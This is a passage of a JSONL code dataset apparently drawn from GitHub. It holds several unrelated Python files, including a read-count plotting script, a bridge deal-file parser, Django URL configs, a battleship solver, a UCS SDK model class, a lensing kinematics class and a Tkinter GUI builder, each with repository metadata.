ax1.set_ylabel('Cumulative Fraction of Reads', fontsize=10)\n ax1.tick_params(labelsize=11)\n ax1.set_title('Read Count Inequality (Genes)', fontsize=10)\n ax1.text(.05,.8,'Gini coefficient: '+str((round(GiniIndex_g*1000)/1000)),fontsize=9) \n plt.tight_layout()\n plt.savefig(sample+'_LorenzCurves.png',dpi=res)\n if svg:\n plt.savefig(sample+'_LorenzCurves.svg') \n \n # --------------------------------------\n # Boxplots & Histograms\n # --------------------------------------\n fig = plt.figure(figsize=(6,5)) \n gs = gridspec.GridSpec(2, 2, width_ratios=[1, 2])\n ax0 = plt.subplot(gs[0])\n ax1 = plt.subplot(gs[1])\n ax2 = plt.subplot(gs[2])\n ax3 = plt.subplot(gs[3]) \n print('Generating boxplots...')\n # Reads per guide: Boxplot\n bp = ax0.boxplot(ReadsPerGuide, showfliers = False, patch_artist=True) # No outliers\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['medians'], color='red') \n plt.setp(bp['whiskers'], color='black')\n for patch in bp['boxes']:\n patch.set(facecolor='#92fcae') \n ax0.set_xticks([''])\n ax0.set_ylabel('Counts per sgRNA', fontsize=11)\n ax0.tick_params(labelsize=11)\n # Reads per gene: Boxplot\n bp = ax2.boxplot(ReadsPerGene, showfliers = False, patch_artist=True) # No outliers\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['medians'], color='red') \n plt.setp(bp['whiskers'], color='black')\n for patch in bp['boxes']:\n patch.set(facecolor='#9de4f9') \n ax2.set_xticks([''])\n ax2.set_ylabel('Counts per Gene', fontsize=11)\n ax2.tick_params(labelsize=11)\n print('Generating histograms...')\n # Reads per guide: Histogram\n ax1.set_title('EMPTY', color='white', fontsize=14)\n fig.text(.3,.95,'Read Distribution (sgRNAs)', fontsize=12)\n Counts_noFliers = list()\n max_count = max(40,int(numpy.percentile(ReadsPerGuide,99)))\n max_count = min(max_count,60) \n for count in ReadsPerGuide:\n if count <= max_count:\n Counts_noFliers.append(count)\n ax1.hist(Counts_noFliers, color='green', bins=range(max_count+2), align = 'left') \n ax1.set_xlabel('Counts per sgRNA', fontsize=11)\n ax1.set_ylabel('Number of sgRNAs', fontsize=11) \n ax1.tick_params(labelsize=11)\n formatter = FuncFormatter(kilos)\n ax1.yaxis.set_major_formatter(formatter)\n ax1.set_xlim([-10,max_count])\n # Reads per gene: Histogram\n ax3.set_title('EMPTY', color='white', fontsize=14)\n fig.text(.3,.47,'Read Distribution (Genes)', fontsize=12)\n Counts_noFliers = list()\n max_count = max(40,int(numpy.percentile(ReadsPerGene,99)))\n max_count = min(max_count,120)\n for count in ReadsPerGene:\n if count <= max_count:\n Counts_noFliers.append(count)\n ax3.hist(Counts_noFliers, color='blue', bins=range(max_count+2), align = 'left')\n ax3.set_xlabel('Counts per Gene', fontsize=11)\n ax3.set_ylabel('Number of Genes', fontsize=11)\n ax3.tick_params(labelsize=11)\n formatter = FuncFormatter(kilos1)\n ax3.yaxis.set_major_formatter(formatter) \n ax3.set_xlim([-5,max_count])\n plt.tight_layout()\n plt.savefig(sample+'_ReadCount_Distribution.png',dpi=res)\n if svg:\n plt.savefig(sample+'_ReadCount_Distribution.svg') \n \n # --------------------------------------------\n # Counts distribution\n # --------------------------------------------\n print('Writing distribution file ... ')\n N_Guides = len(ReadsPerGuide)\n N_Genes = len(ReadsPerGene)\n guide_m = int(numpy.median(ReadsPerGuide))\n guide_sd = int(numpy.std(ReadsPerGuide))\n guide_q25 = int(numpy.percentile(ReadsPerGuide,25))\n guide_q75 = int(numpy.percentile(ReadsPerGuide,75))\n guide_min = int(min(ReadsPerGuide)) \n guide_max = int(max(ReadsPerGuide))\n guide_pres = [1 for n in ReadsPerGuide if n > 0]\n guide_pres = len(guide_pres)\n guide_pres100 = round((guide_pres/N_Guides)*1000)/10\n gene_m = int(numpy.median(ReadsPerGene))\n gene_sd = int(numpy.std(ReadsPerGene))\n gene_q25 = int(numpy.percentile(ReadsPerGene,25))\n gene_q75 = int(numpy.percentile(ReadsPerGene,75))\n gene_min = int(min(ReadsPerGene)) \n gene_max = int(max(ReadsPerGene))\n gene_pres = [1 for n in ReadsPerGene if n > 0]\n gene_pres = len(gene_pres)\n gene_pres100 = round((gene_pres/N_Genes)*1000)/10\n # Write log file\n LogFile = open(logfilename,'w') \n LogFile.write(sample+' Read Counts Distribution:\\n')\n LogFile.write('***********************************\\n')\n LogFile.write('\\n')\n LogFile.write('Read Counts per sgRNA (normalized)\\n') \n LogFile.write('------------------------------------\\n')\n LogFile.write('Median:\\t\\t\\t'+str(guide_m)+'\\n')\n LogFile.write('Standard Deviation:\\t'+str(guide_sd)+'\\n') \n LogFile.write('25% Quantile:\\t\\t'+str(guide_q25)+'\\n')\n LogFile.write('75% Quantile:\\t\\t'+str(guide_q75)+'\\n')\n LogFile.write('Minimum:\\t\\t'+str(guide_min)+'\\n')\n LogFile.write('Maximum:\\t\\t'+str(guide_max)+'\\n')\n LogFile.write('sgRNA Representation:\\t'+str(guide_pres)+' ('+str(guide_pres100)+'%)\\n')\n LogFile.write('Gini coefficient:\\t'+str(GiniIndex_u)+'\\n')\n LogFile.write('\\n')\n LogFile.write('Read Counts per Gene (normalized)\\n') \n LogFile.write('------------------------------------\\n')\n LogFile.write('Median:\\t\\t\\t'+str(gene_m)+'\\n')\n LogFile.write('Standard Deviation:\\t'+str(gene_sd)+'\\n') \n LogFile.write('25% Quantile:\\t\\t'+str(gene_q25)+'\\n')\n LogFile.write('75% Quantile:\\t\\t'+str(gene_q75)+'\\n')\n LogFile.write('Minimum:\\t\\t'+str(gene_min)+'\\n')\n LogFile.write('Maximum:\\t\\t'+str(gene_max)+'\\n')\n LogFile.write('Gene Representation:\\t'+str(gene_pres)+' ('+str(gene_pres100)+'%)\\n')\n LogFile.write('Gini coefficient:\\t'+str(GiniIndex_g)+'\\n') \n LogFile.close()\n\n # --------------------------------------\n # Final time stamp\n # -------------------------------------- \n os.chdir(ScriptsDir) \n end_total = time.time()\n # Final time stamp\n print('------------------------------------------------')\n print('Script completed.') \n sec_elapsed = end_total - start_total\n if sec_elapsed < 60:\n time_elapsed = sec_elapsed\n print('Time elapsed [secs]: ' + '%.3f' % time_elapsed +'\\n')\n elif sec_elapsed < 3600:\n time_elapsed = sec_elapsed/60\n print('Time elapsed [mins]: ' + '%.3f' % time_elapsed +'\\n')\n else:\n time_elapsed = sec_elapsed/3600\n print('Time elapsed [hours]: ' + '%.3f' % time_elapsed +'\\n') \n\n\nif __name__ == \"__main__\":\n input1 = sys.argv[1]\n AnalyzeCounts(input1)\n","repo_name":"LewisLabUCSD/PinAPL-Py","sub_path":"Scripts/AnalyzeReadCounts.py","file_name":"AnalyzeReadCounts.py","file_ext":"py","file_size_in_byte":10352,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"43401304974","text":"import warnings\n\nfrom . import DealFormat\nfrom .. import dto\n\nclass DGEFormat(DealFormat):\n number_warning = '.dge file format assumes consequent deal numbers from 1'\n suits = {\n chr(6): dto.SUIT_SPADES,\n chr(3): dto.SUIT_HEARTS,\n chr(4): dto.SUIT_DIAMONDS,\n chr(5): dto.SUIT_CLUBS\n }\n\n def suit_indicator(self, the_suit):\n for indicator, suit in self.suits.items():\n if suit == the_suit:\n return indicator\n return None\n\n @property\n def suffix(self):\n return '.dge'\n\n def parse_content(self, content):\n warnings.warn(self.number_warning)\n dealset = []\n number = 1\n while True:\n deal_str = content.read(128).strip()\n if len(deal_str) > 0:\n if len(deal_str) < 68:\n warnings.warn('truncated .dge input: %s' % (deal_str))\n break\n else:\n deal = dto.Deal()\n deal.number = number\n deal.dealer = deal.get_dealer(number)\n deal.vulnerable = deal.get_vulnerability(number)\n deal.hands = self.parse_hands(deal_str[0:68])\n dealset.append(deal)\n number += 1\n else:\n break\n return dealset\n\n def parse_hands(self, deal_str):\n deal = dto.Deal()\n hand = 0\n suit_count = -1\n suit = None\n for char in deal_str[0:68]:\n if char in self.suits:\n suit = self.suits[char]\n suit_count += 1\n if suit_count == 4:\n suit_count = 0\n hand += 1\n else:\n if suit is None:\n raise RuntimeError('invalid .dge line: %s' % (deal_str))\n else:\n deal.hands[hand][suit].append(char)\n return deal.hands\n\n def output_content(self, out_file, dealset):\n warnings.warn(self.number_warning)\n for deal in dealset:\n deal_str = self.single_deal_output(deal)\n deal_str += chr(0) * 60\n out_file.write(deal_str)\n\n def single_deal_output(self, deal):\n deal_str = ''\n for hand in deal.hands:\n for suit, cards in enumerate(hand):\n deal_str += self.suit_indicator(suit)\n deal_str += ''.join(cards)\n return deal_str\n","repo_name":"emkael/deal-convert","sub_path":"dealconvert/formats/dge.py","file_name":"dge.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"71242142777","text":"from django.conf.urls import patterns, url\n\n__author__ = 'Dimas Ciputra '\n__date__ = '07/09/16'\n\nurlpatterns = patterns(\n \"clients.views\",\n url(\"^client/(?P.*)/$\",\n \"client_detail\",\n name=\"client_detail\"),\n url(\"^all/$\",\n \"get_all_clients\",\n name=\"get_all_clients\")\n)\n","repo_name":"kartoza/docker-mezzanine","sub_path":"django_project/clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"4190673393","text":"def coins(x):\n #Prints the number of US coins (quarters, dimes, nickles, pennies) needed\n cents = x\n quarternum = 0\n dimenum = 0\n nicklenum = 0\n pennynum = 0 #Maybe count out amount of each coin, subtract penny ammount by nickleam *5, dime*10...\n #GOTTA FIND OUT HOW TO GET THE NUMBER FROM A %\n total = 0\n\n if cents % 25 == 0: #QUARTERS\n while cents > 0:\n cents = cents - 25\n quarternum = quarternum +1\n else: \n while cents > (cents%25):\n cents = cents - 25\n quarternum = quarternum +1\n \n \n if cents % 10 == 0: #DIME\n while cents > 0:\n cents = cents - 10\n dimenum = dimenum +1\n else: \n while cents > (cents%10):\n cents = cents - 10\n dimenum = dimenum +1\n \n if cents % 5 == 0: #nickle\n while cents > 0:\n cents = cents - 5\n nicklenum = nicklenum +1\n else: \n while cents > (cents%5):\n cents = cents - 5\n nicklenum = nicklenum +1\n \n #NEED ALT LOOP FOR PENNIES?\n pennynum = cents\n total = quarternum + dimenum + nicklenum +pennynum\n\n return total","repo_name":"enderquestral/Reed-CSCI121","sub_path":"Week2/coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40256256592","text":"# -*- coding: utf-8 -*-\n\nfrom django.urls import path\n\nfrom cast.views import (\n SearchView, PodcastDetailView, PodcastAboutView,\n PodcastMonthArchiveView, uplike\n )\n \nfrom cast.models import Podcast\n\napp_name = 'cast'\n\nurlpatterns = [\n path('search/', SearchView.as_view(), name='search'),\n path('p///', PodcastDetailView.as_view(), name='podcast'),\n path('p///like/', uplike, name='uplike'),\n path('p/archive///', PodcastMonthArchiveView.as_view(), name='archive_month'),\n path('about/', PodcastAboutView.as_view(), name='about'),\n]\n","repo_name":"flavien-hugs/podcast-gbekefm","sub_path":"cast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"37344611356","text":"from enum import Enum\nimport colorama\nfrom colorama import Fore, Back, Style\n\nclass FieldType(Enum):\n empty = 1\n water = 2\n ship = 3\n\nclass ShipOrientation(Enum):\n unknown = 0\n none = 1\n north = 2\n south = 3\n east = 4\n west = 5\n both = 6\n\nclass Field(object):\n def __init__(self):\n self.__fixed = False\n self.__type = FieldType.empty\n self.__marked_type = FieldType.empty\n self.__orientation = ShipOrientation.none\n\n @property\n def marked_type(self):\n return self.__type if self.__fixed else self.__marked_type\n\n def set_fixed(self, typ=None, orientation=ShipOrientation.unknown):\n self.__fixed = True\n\n if typ is not None:\n self.__type = typ\n self.__marked_type = typ\n self.__orientation = orientation\n\n def __str__(self):\n typ = self.__type if self.__fixed else self.__marked_type\n\n if typ == FieldType.empty:\n return ' '\n elif typ == FieldType.water:\n return '~~'\n elif typ == FieldType.ship:\n if self.__orientation == ShipOrientation.unknown:\n return '??'\n elif self.__orientation == ShipOrientation.none:\n return '<>'\n elif self.__orientation == ShipOrientation.north:\n return '^^'\n elif self.__orientation == ShipOrientation.south:\n return 'vv'\n elif self.__orientation == ShipOrientation.west:\n return ' <'\n elif self.__orientation == ShipOrientation.east:\n return '> '\n elif self.__orientation == ShipOrientation.both:\n return 'XX'\n\n def set_type(self, typ, orientation=ShipOrientation.unknown):\n self.__type = typ\n self.__orientation = orientation\n\nclass Table(object):\n def __init__(self, width, height):\n self.__fields = []\n self.__width = width\n self.__height = height\n self.__col_counts = []\n self.__row_counts = []\n self.__ships = []\n\n for count in range(0, height):\n self.__fields.append([])\n self.__row_counts.append(0)\n\n for count in range(0, width):\n self.__col_counts.append(0)\n\n for row in range(0, height):\n self.__fields[row].append(Field())\n\n self.clean()\n\n @property\n def width(self):\n return self.__width\n\n @property\n def height(self):\n return self.__height\n\n def __check_height(self, row):\n if row not in range(0, self.__height):\n raise IndexError(\"Invalid row number\")\n\n def __check_width(self, col):\n if col not in range(0, self.__width):\n raise IndexError(\"Invalid column number\")\n\n def row(self, row):\n self.__check_height(row)\n\n # TODO: This doesn’t feel right\n return self.__fields[row]\n\n def col(self, col):\n self.__check_width(col)\n\n # TODO: This doesn’t feel right\n return [f[col] for f in f.__fields]\n\n def clean(self):\n for row in self.__fields:\n for field in row:\n field.hidden_type = FieldType.water\n field.player_type = FieldType.empty\n field.fixed = False\n\n def __check_collision(self, parts):\n pass\n\n def add_ship(self, start_row, start_col, length, vertical):\n row, col = start_row - 1, start_col - 1\n parts = []\n\n for i in range(0, length):\n parts.append((row, col))\n\n if vertical:\n row += 1\n else:\n col += 1\n\n count = 0\n\n for row, col in parts:\n count += 1\n orientation = ShipOrientation.unknown\n\n if length == 1:\n orientation=ShipOrientation.none\n else:\n if count == 1:\n orientation = ShipOrientation.north if vertical \\\n else ShipOrientation.west\n elif count == length:\n orientation = ShipOrientation.south if vertical \\\n else ShipOrientation.east\n else:\n orientation = ShipOrientation.both\n\n self.__fields[row][col].set_type(FieldType.ship,\n orientation=orientation)\n\n def reveal(self, row, col):\n self.__fields[row - 1][col - 1].set_fixed()\n\n def reveal_all(self):\n for row in self.__fields:\n for field in row:\n field.fixed = True\n\n @property\n def solved(self):\n # Check if all fileds have been marked\n for row in self.__fields:\n for field in row:\n if field.player_type == FieldType.empty:\n return False\n\n # TODO: Check if marked ships are placed sanely\n # TODO: Check if side-numbers equal the number of marked ship-parts\n\n return True\n\n def mark(self, row, col, typ):\n field = self.__field(row, col)\n\n if field is not None:\n field.player_type = typ\n\n def is_ship(self, row, col):\n return self.__fields[row][col].player_type == FieldType.ship\n\n def __str__(self):\n def divider():\n ret = '+'\n\n for i in range(0, self.__width):\n ret += '--+'\n\n ret += \"\\n\"\n\n return ret\n\n ret = divider()\n\n for row in self.__fields:\n ret += '|'\n\n for field in row:\n ret += '{}|'.format(field)\n\n ret += \"\\n\"\n ret += divider()\n\n return ret\n\nclass Solver(object):\n def __init__(self, table):\n self.table = table\n\n def mark_edges(self):\n for row in range(0, self.table.height):\n for col in range(0, self.table.width):\n if self.table.is_ship(row, col):\n print(\"MARK!\")\n self.table.mark(row - 1, col - 1, FieldType.water)\n self.table.mark(row - 1, col + 1, FieldType.water)\n self.table.mark(row + 1, col - 1, FieldType.water)\n self.table.mark(row + 1, col + 1, FieldType.water)\n\n def show(self):\n print(str(self.table))\n\ncolorama.init()\n\nt = Table(6, 6)\nt.add_ship(1, 3, 1, False)\nt.add_ship(2, 5, 2, False)\nt.add_ship(3, 1, 3, False)\nt.add_ship(5, 1, 1, False)\nt.add_ship(5, 3, 2, True)\nt.add_ship(6, 5, 1, False)\nt.reveal(1, 2)\nt.reveal(3, 3)\nt.reveal(5, 1)\nt.reveal(5, 2)\n\ns = Solver(t)\ns.show()\ns.mark_edges()\ns.show()\n","repo_name":"gergelypolonkai/battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74697547894","text":"#!/usr/bin/env python\n\n''' Description:\tScript that takes a merged-counts.txt file (produced from calling \n get-bam-counts.sh on .bam files) and \n \t\t 1) sums all values in each row\n \t\t 2) To also sort by sum from lowest to largest sum value, see usage\n Usage:\n \t\t 1) /PATH/TO/sum_mergedcounts.py merged_counts.txt\n \t\t 2) /PATH/TO/xec_merge-sum-sort.sh merged_counts.txt\n Output: \n \t\t 1) mc_with-sums.txt \n \t\t 2) mc_with-sums.txt, mc_sum-sort.txt \n \n CYP 07/19/2017\n'''\n\nimport sys\n\nout = open(\"./mc_with-sum.txt\", 'w')\nfirst = True\n\n# key: sum, value: line\nsum_dict = {}\nwith open(sys.argv[1],'r') as f:\n for line in f:\n # skip first line, contains contig names\n if first:\n first = False\n out.write(line)\n else:\n summed = 0\n line = line.strip()\n # vals per line are tab-delimited, separate and store in list\n items = line.split('\\t')\n\n # sum each tab-delimited value in line list (not-including \n # gene name)\n for val in items[1:]:\n summed += int(val)\n\n # write full line to output file with the sum of the values\n # appended to the end of the line\n out.write(line + '\\t' + str(summed) + '\\n')\n\nout.close()\n\n","repo_name":"cypayne/palumbi_scripts","sub_path":"sum_mergedcounts.py","file_name":"sum_mergedcounts.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43059976340","text":"\"\"\"This module contains the general information for MgmtController ManagedObject.\"\"\"\n\nfrom ...ucscmo import ManagedObject\nfrom ...ucsccoremeta import UcscVersion, MoPropertyMeta, MoMeta\nfrom ...ucscmeta import VersionMeta\n\n\nclass MgmtControllerConsts():\n SUBJECT_ADAPTOR = \"adaptor\"\n SUBJECT_BLADE = \"blade\"\n SUBJECT_BOARD_CONTROLLER = \"board-controller\"\n SUBJECT_CHASSIS = \"chassis\"\n SUBJECT_CMC = \"cmc\"\n SUBJECT_IOCARD = \"iocard\"\n SUBJECT_LOCAL_DISK = \"local-disk\"\n SUBJECT_SAS_EXPANDER = \"sas-expander\"\n SUBJECT_SERVER_UNIT = \"server-unit\"\n SUBJECT_SWITCH = \"switch\"\n SUBJECT_SYSTEM = \"system\"\n SUBJECT_UNKNOWN = \"unknown\"\n\n\nclass MgmtController(ManagedObject):\n \"\"\"This is MgmtController class.\"\"\"\n\n consts = MgmtControllerConsts()\n naming_props = set([])\n\n mo_meta = MoMeta(\"MgmtController\", \"mgmtController\", \"mgmt\", VersionMeta.Version101a, \"InputOutput\", 0x1f, [], [\"admin\", \"ls-compute\", \"ls-config\", \"ls-network\", \"ls-server\"], [u'adaptorUnit', u'computeBlade', u'computeBoardController', u'computeRackUnit', u'computeServerUnit', u'computeSystem', u'equipmentChassis', u'equipmentIOCard', u'equipmentSharedIOModule', u'equipmentSwitchIOCard', u'equipmentSystemIOController', u'networkElement', u'storageController', u'storageSasExpander', u'topSystem'], [u'cimcvmediaActualMountList', u'firmwareRunning', u'mgmtCmcSecureBoot', u'mgmtConnection', u'mgmtIf', u'mgmtInterface', u'vnicIpV4PooledAddr', u'vnicIpV4ProfDerivedAddr', u'vnicIpV4StaticAddr'], [\"Get\"])\n\n prop_meta = {\n \"child_action\": MoPropertyMeta(\"child_action\", \"childAction\", \"string\", VersionMeta.Version111a, MoPropertyMeta.INTERNAL, None, None, None, r\"\"\"((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}\"\"\", [], []), \n \"dn\": MoPropertyMeta(\"dn\", \"dn\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []), \n \"guid\": MoPropertyMeta(\"guid\", \"guid\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"model\": MoPropertyMeta(\"model\", \"model\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"oper_conn\": MoPropertyMeta(\"oper_conn\", \"operConn\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 256, None, [], []), \n \"revision\": MoPropertyMeta(\"revision\", \"revision\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"rn\": MoPropertyMeta(\"rn\", \"rn\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []), \n \"serial\": MoPropertyMeta(\"serial\", \"serial\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"status\": MoPropertyMeta(\"status\", \"status\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r\"\"\"((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}\"\"\", [], []), \n \"subject\": MoPropertyMeta(\"subject\", \"subject\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, [\"adaptor\", \"blade\", \"board-controller\", \"chassis\", \"cmc\", \"iocard\", \"local-disk\", \"sas-expander\", \"server-unit\", \"switch\", \"system\", \"unknown\"], []), \n \"supported_capability\": MoPropertyMeta(\"supported_capability\", \"supportedCapability\", \"string\", VersionMeta.Version201b, MoPropertyMeta.READ_ONLY, None, None, None, r\"\"\"((defaultValue|none|modify-maintenance-mode|factory-reset|local-storage|usb-nic),){0,5}(defaultValue|none|modify-maintenance-mode|factory-reset|local-storage|usb-nic){0,1}\"\"\", [], []), \n \"vendor\": MoPropertyMeta(\"vendor\", \"vendor\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n }\n\n prop_map = {\n \"childAction\": \"child_action\", \n \"dn\": \"dn\", \n \"guid\": \"guid\", \n \"model\": \"model\", \n \"operConn\": \"oper_conn\", \n \"revision\": \"revision\", \n \"rn\": \"rn\", \n \"serial\": \"serial\", \n \"status\": \"status\", \n \"subject\": \"subject\", \n \"supportedCapability\": \"supported_capability\", \n \"vendor\": \"vendor\", \n }\n\n def __init__(self, parent_mo_or_dn, **kwargs):\n self._dirty_mask = 0\n self.child_action = None\n self.guid = None\n self.model = None\n self.oper_conn = None\n self.revision = None\n self.serial = None\n self.status = None\n self.subject = None\n self.supported_capability = None\n self.vendor = None\n\n ManagedObject.__init__(self, \"MgmtController\", parent_mo_or_dn, **kwargs)\n\n","repo_name":"CiscoUcs/ucscsdk","sub_path":"ucscsdk/mometa/mgmt/MgmtController.py","file_name":"MgmtController.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"35498273449","text":"import numpy as np\nimport lenstronomy.Util.util as util\nfrom lenstronomy.Data.pixel_grid import PixelGrid\n\n__all__ = [\"KinBin\"]\n\n\nclass KinBin(object):\n \"\"\"Class that summarizes the binned kinematic data.\n\n The KinBin() class is initialized with :\n - The information about the bins (bin values, and bin covariances, which pixels belong to which bin):\n bin_data, bin_cov, bin_mask.\n - The information about the associated intial shape of the unbinned kinematic map: bin_mask gives the index of\n corresponding bin for each pixel), and ra_at_xy_0,dec_at_xy_0,transform_pix2angle,ra_shift,dec_shift are the usual\n PixelGrid characteritics.\n \"\"\"\n\n def __init__(\n self,\n bin_data,\n bin_cov,\n bin_mask,\n ra_at_xy_0,\n dec_at_xy_0,\n transform_pix2angle,\n psf_class,\n ra_shift=0,\n dec_shift=0,\n ):\n \"\"\"\n :param bin_data: list, kinematic value of each bin, ordered by bin index.\n :param bin_cov: 2D array (nbins x nbins), vrms covariance matrix associated to each bin, ordered by bin index\n :param bin_mask: 2D array, mapping from the unbinned image to the binned one, each pixel value is the\n corresponding bin index.\n :param ra_at_xy_0: float, ra coordinate at pixel (0,0) (unbinned image)\n :param dec_at_xy_0: float, dec coordinate at pixel (0,0) (unbinned image)\n :param transform_pix2angle: 2x2 array, mapping of pixel (unbinned image) to coordinate\n :param psf_class: PSF class\n :param ra_shift: float, RA shift of pixel grid\n :param dec_shift: float, DEC shift of pixel grid\n\n \"\"\"\n self.PSF = psf_class\n nx, ny = np.shape(bin_mask)\n self._nx = nx\n self._ny = ny\n self.PixelGrid = PixelGrid(\n nx, ny, transform_pix2angle, ra_at_xy_0 + ra_shift, dec_at_xy_0 + dec_shift\n )\n\n self.data = bin_data\n self.covariance = bin_cov\n self.bin_mask = bin_mask\n self._pix2a = transform_pix2angle\n self._ra_at_xy_0 = ra_at_xy_0\n self._dec_at_xy_0 = dec_at_xy_0\n\n @staticmethod\n def binned_image(data, bin_mask):\n \"\"\"Creates the binned image of the data.\n\n :param data: data value in each bin\n :param bin_mask: mask indicating which pixels belong to which bin\n \"\"\"\n binned_image = np.zeros_like(bin_mask)\n for idx, value in enumerate(data):\n binned_image[bin_mask == idx] = value\n return binned_image\n\n def kin_bin2kwargs(self):\n \"\"\"Creates the kwargs needed for the 2D kinematic likelihood.\"\"\"\n kwargs = {\n \"image\": self.binned_image(self.data, self.bin_mask),\n \"deltaPix\": self.PixelGrid.pixel_width,\n \"transform_pix2angle\": self._pix2a,\n \"ra_at_xy0\": self._ra_at_xy_0,\n \"dec_at_xy0\": self._dec_at_xy_0,\n }\n return kwargs\n\n def kin_grid(self):\n \"\"\"Creates a pixel grid that satisfy the kinematics coordinates system.\"\"\"\n x_grid, y_grid = self.PixelGrid.pixel_coordinates\n return x_grid, y_grid\n","repo_name":"lenstronomy/lenstronomy","sub_path":"lenstronomy/Data/kinematic_bin_2D.py","file_name":"kinematic_bin_2D.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"22"} +{"seq_id":"875775639","text":"target = [i for i in range(10)]\nlength = 4\nanswer = []\n\n# def dfs(idx, list):\n# if len(list) == length:\n# answer.append(list)\n# return\n\n# for i in range(idx, len(target)):\n# print(f'i+1, list+[l[i]]: {i+1, list+[target[i]]}')\n# dfs(i+1, list+[target[i]])\n\n# dfs(0, [])\n# print(answer)\n\ndef combination_dfs(idx, temp_list):\n if len(temp_list) == length:\n answer.append(temp_list)\n return\n\n # 중복 조합은 i+1을 i로 격하\n for i in range(idx, len(target)):\n print(f'Start with idx : {idx}')\n print(f'From list {temp_list} > {temp_list + [target[i]]}')\n combination_dfs(i, temp_list+[target[i]])\n\ncombination_dfs(0, [])\nprint(answer)\n\n\n","repo_name":"Hoonst/algorithm","sub_path":"Samsung_Special/skillset/combination.py","file_name":"combination.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"47042682659","text":"#coding:utf-8\r\nfrom Tkinter import *\r\nfrom myComponent import *\r\nfrom tkMessageBox import *\r\nimport os\r\n\r\nclass TKIDLE: #TKIDLE类,包含主要程序\r\n def __init__(self,root,m):\r\n self.root = root\r\n self.m = m\r\n \r\n self.w = 600 #界面宽\r\n self.h = 400 #界面高\r\n \r\n self.createMenuAfter()\r\n \r\n def setRootTl(self): #设置界面的高与宽的窗口界面\r\n self.roottl = Toplevel()\r\n tl = self.roottl\r\n Label(tl,text='width =').grid()\r\n Label(tl,text='height =').grid()\r\n self.wstr = StringVar()\r\n Entry(tl,textvariable = self.wstr).grid(row=0,column=1)\r\n self.wstr.set('600')\r\n self.hstr = StringVar()\r\n Entry(tl,textvariable = self.hstr).grid(row=1,column=1)\r\n self.hstr.set('400')\r\n self.frameBtn = Button(tl,text='确定',command = self.setRoot)\r\n self.frameBtn.grid(row=2,column=1)\r\n self.frameBtn.focus_set()\r\n tl.mainloop()\r\n \r\n def setRoot(self): #设置界面的高与宽\r\n if (self.wstr.get() != '') and (self.hstr.get() != ''):\r\n self.w = eval(self.wstr.get())\r\n self.h = eval(self.hstr.get())\r\n self.root.geometry(str(self.w)+'x'+str(self.h))\r\n \r\n \r\n \r\n def createMenuAfter(self): #创建菜单\r\n self.commenu = Menu(self.m) #创建菜单,包含添加控件与设置界面长宽\r\n self.m.add_cascade(label = 'Component', menu = self.commenu)\r\n self.commenu.add_command(label = 'set width&height', command = self.setRootTl)\r\n self.commenu.add_command(label = 'add Button', command = self.addButton)\r\n self.commenu.add_command(label = 'add Label', command = self.addLabel)\r\n self.commenu.add_command(label = 'add Text', command = self.addText)\r\n self.commenu.add_command(label = 'add Entry', command = self.addEntry)\r\n self.commenu.add_command(label = 'add Checkbutton', command = self.addCheckbutton)\r\n self.commenu.add_command(label = 'add Radiobutton', command = self.addRadiobutton)\r\n self.allComponent = []\r\n \r\n self.outmenu = Menu(self.m) #添加输出.py的菜单\r\n self.m.add_cascade(label = 'Output', menu = self.outmenu)\r\n self.outmenu.add_command(label = 'Output GUIofProject.py', command = self.outputPy)\r\n \r\n def addButton(self): #添加Button,创建一个myButton实例\r\n btn = myButton(self.root,len(self.allComponent))\r\n self.allComponent.append(btn)\r\n \r\n def addText(self): #添加Text,创建一个myText实例\r\n txt = myText(self.root,len(self.allComponent))\r\n self.allComponent.append(txt)\r\n \r\n def addEntry(self): #添加Entry,创建myEntry实例\r\n entry = myEntry(self.root,len(self.allComponent))\r\n self.allComponent.append(entry)\r\n \r\n def addLabel(self): #添加Label,创建myLabel实例\r\n lbl = myLabel(self.root,len(self.allComponent))\r\n 